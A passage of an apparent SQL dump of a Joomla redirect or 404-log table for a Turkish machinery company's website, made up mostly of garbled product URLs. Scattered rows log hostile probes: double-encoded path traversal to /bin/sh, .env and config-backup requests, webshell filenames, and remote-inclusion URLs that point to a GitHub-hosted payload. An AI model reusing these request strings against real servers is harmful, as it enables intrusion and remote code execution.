00:00:00',301),(27833,'http://3s-technologies.com.tr/assets/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh',NULL,'','',1,0,'2021-10-10 17:03:53','0000-00-00 00:00:00',301),(27834,'http://3s-technologies.com.tr/icons/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh',NULL,'','',1,0,'2021-10-10 17:03:59','0000-00-00 00:00:00',301),(27835,'http://3s-technologies.com.tr/uploads/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh',NULL,'','',1,0,'2021-10-10 17:04:05','0000-00-00 00:00:00',301),(27836,'http://3s-technologies.com.tr/img/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh',NULL,'','',1,0,'2021-10-10 17:04:10','0000-00-00 00:00:00',301),(27837,'http://3s-technologies.com.tr/en/images/slideshow/00-center-comp-1-640x377.png',NULL,'https://google.com','',6,0,'2021-10-16 02:29:31','0000-00-00 00:00:00',301),(27838,'https://3s-technologies.com.tr/.env',NULL,'','',10,0,'2021-10-17 20:22:30','0000-00-00 00:00:00',301),(27839,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/pcb-prototip-prototyping/pcb-kaz%c4%b1ma-milling',NULL,'http://www.google.com','',1,0,'2021-10-19 02:17:55','0000-00-00 00:00:00',301),(27840,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/konveyorler',NULL,'','',1,0,'2021-10-19 16:48:15','0000-00-00 00:00:00',301),(27841,'https://3s-technologies.com.tr/en/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',14,0,'2021-10-19 18:30:48','0000-00-00 00:00:00',301),(27842,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/temizleme-makineleri',NULL,'','',1,0,'2021-10-20 01:40:52','0000-00-00 00:00:00',301),(27843,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/npm-vf-detail?tmpl=component&print=1',NULL,'','',2,0,'2021-10-20 03:33:13','0000-00-00 00:00:00',301),(27844,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama',NULL,'','',1,0,'2021-10-20 12:22:55','0000-00-00 00:00:00',301),(27845,'http://3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing',NULL,'','',4,0,'2021-10-21 10:31:01','0000-00-00 00:00:00',301),(27846,'https://www.3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme',NULL,'','',4,0,'2021-10-22 04:07:53','0000-00-00 00:00:00',301),(27847,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter/npm-vf-detail/askquestion?tmpl=component',NULL,'','',2,0,'2021-10-22 12:11:45','0000-00-00 00:00:00',301),(27848,'https://www.3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing',NULL,'','',4,0,'2021-10-22 13:32:41','0000-00-00 00:00:00',301),(27849,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/akrilik-iåÿleme-acrylic-processing',NULL,'','',4,0,'2021-10-22 18:36:25','0000-00-00 00:00:00',301),(27850,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/odd-shape-inserter',NULL,'','',2,0,'2021-10-22 22:20:05','0000-00-00 00:00:00',301),(27851,'https://www.3s-technologies.com.tr/tr/hakkä±mä±zda',NULL,'','',6,0,'2021-10-22 23:51:04','0000-00-00 00:00:00',301),(27852,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama',NULL,'','',1,0,'2021-10-23 04:35:12','0000-00-00 00:00:00',301),(27853,'http://3s-technologies.com.tr/upl.php',NULL,'','',1,0,'2021-10-23 10:07:25','0000-00-00 00:00:00',301),(27854,'https://3s-technologies.com.tr/tr/security.txt',NULL,'https://3s-technologies.com.tr/security.txt','',3,0,'2021-10-23 14:31:53','0000-00-00 00:00:00',301),(27855,'http://3s-technologies.com.tr/tr/security.txt',NULL,'http://3s-technologies.com.tr/security.txt','',5,0,'2021-10-23 14:31:58','0000-00-00 00:00:00',301),(27856,'https://3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing/aluminyum-iåÿleme-aluminum-processing',NULL,'','',4,0,'2021-10-23 16:56:39','0000-00-00 00:00:00',301),(27857,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim',NULL,'','',3,0,'2021-10-24 15:11:17','0000-00-00 00:00:00',301),(27858,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/dirdesc?language=tr-tr&keyword=',NULL,'','',5,0,'2021-10-24 17:08:47','0000-00-00 00:00:00',301),(27859,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/avb-detail',NULL,'','',6,0,'2021-10-25 23:56:17','0000-00-00 00:00:00',301),(27860,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n',NULL,'','',2,0,'2021-10-26 06:48:40','0000-00-00 00:00:00',301),(27861,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-26 22:10:23','0000-00-00 00:00:00',301),(27862,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,mf_name?language=tr-tr&keyword=',NULL,'','',10,0,'2021-10-27 18:49:13','0000-00-00 00:00:00',301),(27863,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-27 18:51:54','0000-00-00 00:00:00',301),(27864,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-27 19:11:47','0000-00-00 00:00:00',301),(27865,'https://3s-technologies.com.tr/autodiscover/autodiscover.xml',NULL,'','',9,0,'2021-10-27 21:18:42','0000-00-00 00:00:00',301),(27866,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/avf-detail',NULL,'','',2,0,'2021-10-27 23:16:23','0000-00-00 00:00:00',301),(27867,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-28 05:53:46','0000-00-00 00:00:00',301),(27868,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/ddm-novastar',NULL,'','',5,0,'2021-10-28 06:30:43','0000-00-00 00:00:00',301),(27869,'http://www.3s-technologies.com.tr/tr/?r?nler',NULL,'','',3,0,'2021-10-28 10:25:17','0000-00-00 00:00:00',301),(27870,'http://www.3s-technologies.com.tr/tr/?r?nler/cnc',NULL,'','',3,0,'2021-10-28 10:25:46','0000-00-00 00:00:00',301),(27871,'http://www.3s-technologies.com.tr/tr/?r?nler/lazer-markalama',NULL,'','',3,0,'2021-10-28 10:25:50','0000-00-00 00:00:00',301),(27872,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-28 11:11:49','0000-00-00 00:00:00',301),(27873,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/spartan-8s-8d-detail',NULL,'','',4,0,'2021-10-29 00:57:24','0000-00-00 00:00:00',301),(27874,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,category_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-29 02:16:19','0000-00-00 00:00:00',301),(27875,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,product_sku?language=tr-tr&keyword=',NULL,'','',4,0,'2021-10-29 03:32:18','0000-00-00 00:00:00',301),(27876,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh2-20-detail',NULL,'','',2,0,'2021-10-29 03:46:37','0000-00-00 00:00:00',301),(27877,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/wood-processing-ahåÿap-iåÿleme',NULL,'','',2,0,'2021-10-29 08:18:16','0000-00-00 00:00:00',301),(27878,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/panasonic?tmpl=component',NULL,'','',1,0,'2021-10-29 08:55:16','0000-00-00 00:00:00',301),(27879,'https://www.3s-technologies.com.tr/tr/akrilik-iåÿleme-acrylic-processing/akrilik-iåÿleme-acrylic-processing',NULL,'','',7,0,'2021-10-29 15:52:17','0000-00-00 00:00:00',301),(27880,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/mi-300-detail?tmpl=component&print=1',NULL,'','',5,0,'2021-10-29 16:46:49','0000-00-00 00:00:00',301),(27881,'https://www.3s-technologies.com.tr/tr/ahåÿap-iåÿleme-wood-processing-120cm',NULL,'','',5,0,'2021-10-29 21:27:46','0000-00-00 00:00:00',301),(27882,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/am100-detail?tmpl=component&print=1',NULL,'','',1,0,'2021-10-30 07:52:14','0000-00-00 00:00:00',301),(27883,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2021-10-30 11:21:41','0000-00-00 00:00:00',301),(27884,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,mf_name?language=tr-tr&keyword=',NULL,'','',3,0,'2021-10-30 13:37:54','0000-00-00 00:00:00',301),(27885,'https://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',5,0,'2021-10-30 20:29:45','0000-00-00 00:00:00',301),(27886,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/avb-detail?tmpl=component&print=1',NULL,'','',3,0,'2021-10-30 21:05:53','0000-00-00 00:00:00',301),(27887,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/ly-8c-detail/askquestion?tmpl=component',NULL,'','',9,0,'2021-10-30 22:55:49','0000-00-00 00:00:00',301),(27888,'http://3s-technologies.com.tr/en/wp-load.php?daksldlkdsadas=1',NULL,'','',1,0,'2021-10-31 03:28:20','0000-00-00 00:00:00',301),(27889,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',9,0,'2021-10-31 11:46:11','0000-00-00 00:00:00',301),(27890,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole',NULL,'','',2,0,'2021-10-31 11:54:32','0000-00-00 00:00:00',301),(27891,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/smd-fä±rä±n?language=tr-tr&keyword=',NULL,'','',2,0,'2021-10-31 14:30:46','0000-00-00 00:00:00',301),(27892,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh6-detail',NULL,'','',5,0,'2021-10-31 18:28:36','0000-00-00 00:00:00',301),(27893,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole/av132-detail',NULL,'','',2,0,'2021-10-31 19:14:47','0000-00-00 00:00:00',301),(27894,'http://www.3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',6,0,'2021-10-31 20:39:10','0000-00-00 00:00:00',301),(27895,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-dã¼åÿã¼k-hä±zlä±',NULL,'','',1,0,'2021-11-01 00:22:50','0000-00-00 00:00:00',301),(27896,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/by,product_sku?language=tr-tr&keyword=',NULL,'','',1,0,'2021-11-01 01:48:43','0000-00-00 00:00:00',301),(27897,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,product_sku?language=tr-tr&keyword=',NULL,'','',3,0,'2021-11-01 03:36:26','0000-00-00 00:00:00',301),(27898,'https://www.3s-technologies.com.tr/tr/?r?nler',NULL,'','',1,0,'2021-11-01 04:26:27','0000-00-00 00:00:00',301),(27899,'https://www.3s-technologies.com.tr/tr/?r?nler/cnc',NULL,'','',1,0,'2021-11-01 04:27:00','0000-00-00 00:00:00',301),(27900,'https://www.3s-technologies.com.tr/tr/?r?nler/lazer-markalama',NULL,'','',1,0,'2021-11-01 04:27:02','0000-00-00 00:00:00',301),(27901,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/mi-300-detail/askquestion?tmpl=component',NULL,'','',4,0,'2021-11-01 12:10:10','0000-00-00 00:00:00',301),(27902,'http://www.3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing/aluminyum-iåÿleme-aluminum-processing',NULL,'','',5,0,'2021-11-01 13:43:10','0000-00-00 00:00:00',301),(27903,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,category_name?language=tr-tr&keyword=',NULL,'','',4,0,'2021-11-01 16:25:55','0000-00-00 00:00:00',301),(27904,'https://www.3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-yã¼kseklik-self-levelling',NULL,'','',7,0,'2021-11-01 19:55:27','0000-00-00 00:00:00',301),(27905,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/rh6-detail?tmpl=component&print=1',NULL,'','',5,0,'2021-11-01 20:22:49','0000-00-00 00:00:00',301),(27906,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme',NULL,'','',2,0,'2021-11-01 20:48:30','0000-00-00 00:00:00',301),(27907,'https://www.3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kazä±ma-milling',NULL,'','',6,0,'2021-11-01 21:46:38','0000-00-00 00:00:00',301),(27908,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',2,0,'2021-11-02 02:14:43','0000-00-00 00:00:00',301),(27909,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh2-detail',NULL,'','',5,0,'2021-11-02 03:00:32','0000-00-00 00:00:00',301),(27910,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,product_sku?language=tr-tr&keyword=',NULL,'','',4,0,'2021-11-02 03:47:47','0000-00-00 00:00:00',301),(27911,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/ess-310-24-detail/askquestion?tmpl=component',NULL,'','',3,0,'2021-11-02 04:36:54','0000-00-00 00:00:00',301),(27912,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/ly-8c-detail',NULL,'','',2,0,'2021-11-02 07:50:19','0000-00-00 00:00:00',301),(27913,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturers/?tmpl=component',NULL,'','',1,0,'2021-11-02 12:08:43','0000-00-00 00:00:00',301),(27914,'https://3s-technologies.com.tr/en/apple-touch-icon-152x152-precomposed.png',NULL,'','',2,0,'2021-11-02 18:59:47','0000-00-00 00:00:00',301),(27915,'https://3s-technologies.com.tr/en/apple-touch-icon-152x152.png',NULL,'','',2,0,'2021-11-02 18:59:47','0000-00-00 00:00:00',301),(27916,'http://3s-technologies.com.tr/tr/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',7,0,'2021-11-02 19:41:01','0000-00-00 00:00:00',301),(27917,'https://www.3s-technologies.com.tr/tr/wood-processing-ahåÿap-iåÿleme/mdf-iåÿleme-mdf-processing',NULL,'','',7,0,'2021-11-03 03:49:03','0000-00-00 00:00:00',301),(27918,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/by,product_name?language=tr-tr&keyword=',NULL,'','',3,0,'2021-11-03 10:44:29','0000-00-00 00:00:00',301),(27919,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-detail/askquestion?tmpl=component',NULL,'','',3,0,'2021-11-04 03:36:42','0000-00-00 00:00:00',301),(27920,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh2-20-detail',NULL,'','',4,0,'2021-11-04 04:36:08','0000-00-00 00:00:00',301),(27921,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/rh2-20-detail/askquestion?tmpl=component',NULL,'','',5,0,'2021-11-04 07:45:43','0000-00-00 00:00:00',301),(27922,'http://www.3s-technologies.com.tr/en/style.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:36:07','0000-00-00 00:00:00',301),(27923,'http://www.3s-technologies.com.tr/en/moduless.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:36:25','0000-00-00 00:00:00',301),(27924,'http://www.3s-technologies.com.tr/en/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:36:46','0000-00-00 00:00:00',301),(27925,'http://www.3s-technologies.com.tr/en/boom.php?x',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:37:35','0000-00-00 00:00:00',301),(27926,'http://www.3s-technologies.com.tr/en/wp-content/plugins/backup_index.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:37:44','0000-00-00 00:00:00',301),(27927,'http://www.3s-technologies.com.tr/en/wp-content/db_cache.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:37:50','0000-00-00 00:00:00',301),(27928,'http://www.3s-technologies.com.tr/en/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:38:17','0000-00-00 00:00:00',301),(27929,'http://www.3s-technologies.com.tr/en/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:38:25','0000-00-00 00:00:00',301),(27930,'http://www.3s-technologies.com.tr/en/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:38:42','0000-00-00 00:00:00',301),(27931,'http://www.3s-technologies.com.tr/en/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/exv1',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:38:56','0000-00-00 00:00:00',301),(27932,'http://www.3s-technologies.com.tr/en/alfindex.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:39:03','0000-00-00 00:00:00',301),(27933,'http://www.3s-technologies.com.tr/en/alfa.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:39:20','0000-00-00 00:00:00',301),(27934,'http://www.3s-technologies.com.tr/en/wp-booking.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:39:41','0000-00-00 00:00:00',301),(27935,'http://www.3s-technologies.com.tr/en/cindex.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:39:53','0000-00-00 00:00:00',301),(27936,'http://www.3s-technologies.com.tr/en/wp-content/wp-1ogin_bak.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:40:13','0000-00-00 00:00:00',301),(27937,'http://www.3s-technologies.com.tr/en/wp-1ogin_bak.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:40:35','0000-00-00 00:00:00',301),(27938,'http://www.3s-technologies.com.tr/en/wp-includes/fonts/css.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:40:45','0000-00-00 00:00:00',301),(27939,'http://www.3s-technologies.com.tr/en/wp-includes/css/css.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:40:57','0000-00-00 00:00:00',301),(27940,'http://www.3s-technologies.com.tr/en/old-index.php',NULL,'anonymousfox.co','',4,0,'2021-11-04 12:41:15','0000-00-00 00:00:00',301),(27941,'http://www.3s-technologies.com.tr/en/config.bak.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:41:27','0000-00-00 00:00:00',301),(27942,'http://www.3s-technologies.com.tr/en/wp-admin/config.bak.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:41:45','0000-00-00 00:00:00',301),(27943,'http://www.3s-technologies.com.tr/en/wp-content/config.bak.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:42:04','0000-00-00 00:00:00',301),(27944,'http://www.3s-technologies.com.tr/en/wp-includes/config.bak.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:42:17','0000-00-00 00:00:00',301),(27945,'http://www.3s-technologies.com.tr/en/wp-content/themes/config.bak.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:42:28','0000-00-00 00:00:00',301),(27946,'http://www.3s-technologies.com.tr/en/wp-content/plugins/config.bak.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:42:40','0000-00-00 00:00:00',301),(27947,'https://www.3s-technologies.com.tr/wp-includes/css/wp-config.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:42:58','0000-00-00 00:00:00',301),(27948,'http://www.3s-technologies.com.tr/en/wp-content/plugins/ubh/up.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:43:13','0000-00-00 00:00:00',301),(27949,'http://www.3s-technologies.com.tr/en/wp-includes/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:43:29','0000-00-00 00:00:00',301),(27950,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wpconfig.bak.php?act=sf',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:43:49','0000-00-00 00:00:00',301),(27951,'http://www.3s-technologies.com.tr/en/haders.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:44:06','0000-00-00 00:00:00',301),(27952,'http://www.3s-technologies.com.tr/en/wp-content/wp-old-index.php?action=login&pass=-1&submit=',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:44:22','0000-00-00 00:00:00',301),(27953,'http://www.3s-technologies.com.tr/en/legion.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:44:31','0000-00-00 00:00:00',301),(27954,'http://www.3s-technologies.com.tr/en/wp-content/mu-plugins/db-safe-mode.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:44:44','0000-00-00 00:00:00',301),(27955,'http://www.3s-technologies.com.tr/en/wp-includes/lfx.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:44:57','0000-00-00 00:00:00',301),(27956,'http://www.3s-technologies.com.tr/en/wp-includes/small.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:45:14','0000-00-00 00:00:00',301),(27957,'http://www.3s-technologies.com.tr/en/up.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:45:26','0000-00-00 00:00:00',301),(27958,'http://www.3s-technologies.com.tr/en/upload.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:45:38','0000-00-00 00:00:00',301),(27959,'http://www.3s-technologies.com.tr/en/config.php',NULL,'anonymousfox.co','',5,0,'2021-11-04 12:45:54','0000-00-00 00:00:00',301),(27960,'http://www.3s-technologies.com.tr/en/test.php?ghost=send',NULL,'anonymousfox.co','',1,0,'2021-11-04 12:46:08','0000-00-00 00:00:00',301),(27961,'http://www.3s-technologies.com.tr/en/wp-content/langar.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:46:19','0000-00-00 00:00:00',301),(27962,'http://www.3s-technologies.com.tr/en/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:46:30','0000-00-00 00:00:00',301),(27963,'http://www.3s-technologies.com.tr/en/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:46:43','0000-00-00 00:00:00',301),(27964,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wpdiscuz/themes/default/style-rtl.css',NULL,'anonymousfox.co','',2,0,'2021-11-04 12:47:04','0000-00-00 00:00:00',301),(27965,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±/am100-detail',NULL,'','',3,0,'2021-11-04 17:22:04','0000-00-00 00:00:00',301),(27966,'https://3s-technologies.com.tr/tr/akrilik-i??leme-acrylic-processing',NULL,'','',2,0,'2021-11-04 18:04:23','0000-00-00 00:00:00',301),(27967,'https://3s-technologies.com.tr/tr/aluminyum-i??leme-aluminum-processing',NULL,'','',2,0,'2021-11-04 18:04:23','0000-00-00 00:00:00',301),(27968,'https://3s-technologies.com.tr/tr/ah??ap-i??leme-wood-processing-120cm',NULL,'','',2,0,'2021-11-04 18:04:26','0000-00-00 00:00:00',301),(27969,'https://3s-technologies.com.tr/tr/akrilik-i??leme-acrylic-processing/akrilik-i??leme-acrylic-processing',NULL,'','',2,0,'2021-11-04 18:40:32','0000-00-00 00:00:00',301),(27970,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kaz??ma-milling',NULL,'','',2,0,'2021-11-04 18:40:34','0000-00-00 00:00:00',301),(27971,'https://3s-technologies.com.tr/en/akrilik-i??leme-acrylic-processing',NULL,'','',3,0,'2021-11-04 18:50:03','0000-00-00 00:00:00',301),(27972,'https://3s-technologies.com.tr/tr/akrilik-i??leme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',2,0,'2021-11-04 18:50:06','0000-00-00 00:00:00',301),(27973,'https://3s-technologies.com.tr/en/aluminyum-i??leme-aluminum-processing/aluminyum-i??leme-aluminum-processing',NULL,'','',2,0,'2021-11-04 18:50:08','0000-00-00 00:00:00',301),(27974,'https://3s-technologies.com.tr/en/ah??ap-i??leme-wood-processing-120cm',NULL,'','',2,0,'2021-11-04 18:50:08','0000-00-00 00:00:00',301),(27975,'https://3s-technologies.com.tr/en/akrilik-i??leme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',2,0,'2021-11-04 18:50:08','0000-00-00 00:00:00',301),(27976,'https://3s-technologies.com.tr/en/wood-processing-ah??ap-i??leme',NULL,'','',2,0,'2021-11-04 18:55:12','0000-00-00 00:00:00',301),(27977,'https://3s-technologies.com.tr/en/aluminyum-i??leme-aluminum-processing',NULL,'','',2,0,'2021-11-04 18:55:14','0000-00-00 00:00:00',301),(27978,'https://3s-technologies.com.tr/tr/aluminyum-i??leme-aluminum-processing/aluminyum-i??leme-aluminum-processing',NULL,'','',2,0,'2021-11-04 18:55:14','0000-00-00 00:00:00',301),(27979,'https://3s-technologies.com.tr/tr/wood-processing-ah??ap-i??leme',NULL,'','',2,0,'2021-11-04 19:04:27','0000-00-00 00:00:00',301),(27980,'https://3s-technologies.com.tr/en/akrilik-i??leme-acrylic-processing/akrilik-i??leme-acrylic-processing',NULL,'','',2,0,'2021-11-04 19:04:28','0000-00-00 00:00:00',301),(27981,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-kaz??ma-milling',NULL,'','',2,0,'2021-11-04 19:04:30','0000-00-00 00:00:00',301),(27982,'https://3s-technologies.com.tr/tr/hakk??m??zda',NULL,'','',2,0,'2021-11-04 19:04:31','0000-00-00 00:00:00',301),(27983,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/ess-310-detail?tmpl=component&print=1',NULL,'','',5,0,'2021-11-04 19:15:23','0000-00-00 00:00:00',301),(27984,'https://3s-technologies.com.tr/en/pcb-prototip-prototyping/pcb-y??kseklik-self-levelling',NULL,'','',2,0,'2021-11-04 19:18:19','0000-00-00 00:00:00',301),(27985,'https://3s-technologies.com.tr/en/wood-processing-ah??ap-i??leme/mdf-i??leme-mdf-processing',NULL,'','',2,0,'2021-11-04 19:18:19','0000-00-00 00:00:00',301),(27986,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-y??kseklik-self-levelling',NULL,'','',2,0,'2021-11-04 19:41:22','0000-00-00 00:00:00',301),(27987,'https://3s-technologies.com.tr/tr/wood-processing-ah??ap-i??leme/mdf-i??leme-mdf-processing',NULL,'','',2,0,'2021-11-04 19:44:56','0000-00-00 00:00:00',301),(27988,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/lfs-1-detail',NULL,'','',11,0,'2021-11-04 20:23:20','0000-00-00 00:00:00',301),(27989,'http://3s-technologies.com.tr/en/images/stories/virtuemart/product/npm-w2_en_20_1001.pdf',NULL,'','',1,0,'2021-11-04 20:35:47','0000-00-00 00:00:00',301),(27990,'https://www.3s-technologies.com.tr/en/akrilik-iåÿleme-acrylic-processing/akrilik-oyma-acrylic-engraving',NULL,'','',7,0,'2021-11-05 08:03:22','0000-00-00 00:00:00',301),(27991,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/npm-w2-detail?tmpl=component&print=1',NULL,'','',2,0,'2021-11-05 08:53:12','0000-00-00 00:00:00',301),(27992,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/cnc/by,product_name?language=tr-tr&keyword=',NULL,'','',4,0,'2021-11-05 10:33:46','0000-00-00 00:00:00',301),(27993,'https://3s-technologies.com.tr/en/ur3qabwb3t9/ywayo6eiwqkyozt0/jbg1v42yhlnwpbn8b',NULL,'','',1,0,'2021-11-06 06:10:55','0000-00-00 00:00:00',301),(27994,'http://3s-technologies.com.tr/tr/project',NULL,'http://3s-technologies.com.tr/project','',2,0,'2021-11-06 06:29:22','0000-00-00 00:00:00',301),(27995,'http://3s-technologies.com.tr/tr/www',NULL,'http://3s-technologies.com.tr/www','',85,0,'2021-11-06 06:29:23','0000-00-00 